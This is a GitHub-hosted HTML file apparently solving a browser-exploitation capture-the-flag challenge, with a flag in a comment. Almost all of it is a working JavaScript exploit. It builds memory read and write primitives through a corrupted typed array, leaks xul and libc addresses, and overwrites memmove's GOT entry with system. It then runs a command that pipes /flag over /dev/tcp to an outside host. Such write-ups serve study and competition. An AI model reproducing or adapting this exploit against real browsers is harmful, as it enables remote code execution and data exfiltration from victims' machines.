-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathexploit.html
117 lines (92 loc) · 3.47 KB
/
exploit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
<!DOCTYPE html>
<html>
<!-- flag{fire_just_makes_the_blaze_better} -->
<head>
<meta charset="utf-8">
<script src="utils.js"></script>
<title></title>
<script type="text/javascript">
function exploit() {
arr = [0x11223344];
ab = new ArrayBuffer(32);
overwrite_len = new Uint32Array(ab);
overwrite_len[0] = 0x77777777;
victim_ab = new ArrayBuffer(32);
victim = new Uint32Array(victim_ab);
victim[0] = 0x88888888;
log("starting");
arr.blaze();
arr[7] = 0x10000;
var ptr_overwrite_idx = -1;
for (var i = 0; i < 1000; i++) {
if (overwrite_len[i] == 0x88888888) {
overwrite_len[i] = 0x98888888;
ptr_overwrite_idx = i;
break;
}
}
log(`ptr_overwrite_idx ${ptr_overwrite_idx} `);
if (ptr_overwrite_idx == -1) {
return;
}
// from https://github.com/phoenhex/files/blob/master/exploits/share-with-care/exploit.js
memory = {
prepare: function(addr, typed_array) {
x = new Int64(addr);
x.rshift();
overwrite_len[ptr_overwrite_idx - 8] = x.lower();
overwrite_len[ptr_overwrite_idx - 7] = x.upper();
return new typed_array(victim_ab);
},
write: function(addr, data) {
view = memory.prepare(addr, Uint32Array);
x = new Int64(data)
view[0] = x.lower();
view[1] = x.upper();
},
read: function(addr) {
view = memory.prepare(addr, Uint32Array);
return new Int64(view[0] + 256 ** 4 * view[1]);
},
readWithTag: function(addr) {
view = memory.prepare(addr, Uint32Array);
return new Int64(view[0] + 256 ** 4 * (view[1] & 0xffff));
}
}
function leak_native(nat_func) {
victim_ab.yolo = nat_func;
victim_ab.haha = 0x13391339;
slots = overwrite_len[ptr_overwrite_idx - 13] * 2 ** 32 + overwrite_len[ptr_overwrite_idx - 12];
slots_0 = (memory.readWithTag(slots).toInt());
return memory.read(slots_0 + 5 * 8).toInt()
}
nat_func = leak_native(Date.now);
log("[+] Date.now @ " + nat_func.toString(16) + "\n");
xul_base = nat_func - 0x49c7ab0;
memmove_got = xul_base + 0x0000818b220;
dup_got = xul_base + 0x0000818b738;
dup_libc = memory.read(dup_got);
libc_base = dup_libc - 0xf7940;
system_libc = libc_base + 0x45390;
log("[+] xul base @ " + xul_base.toString(16), true);
log("[+] memmove@got @ " + memmove_got.toString(16), true);
log("[+] libc_base@libc_@_" + libc_base.toString(16), true);
log("[+] system@libc @ " + system_libc.toString(16), true);
var target = new Uint8Array(100);
var cmd = "bash -ic 'cat /flag > /dev/tcp/my.host/12345' &";
for (var i = 0; i < cmd.length; i++) {
target[i] = cmd.charCodeAt(i);
}
target[cmd.length] = 0;
memmove_backup = memory.read(memmove_got);
memory.write(memmove_got, system_libc);
target.copyWithin(0, 1);
memory.write(memmove_got, memmove_backup);
}
exploit();
</script>
</head>
<body>
</body>
</html>
<!-- 0x00007f9c4b7a6138│+0xc8: 0x00007f9c4b7a70a0 → 0x8899001177889900 -->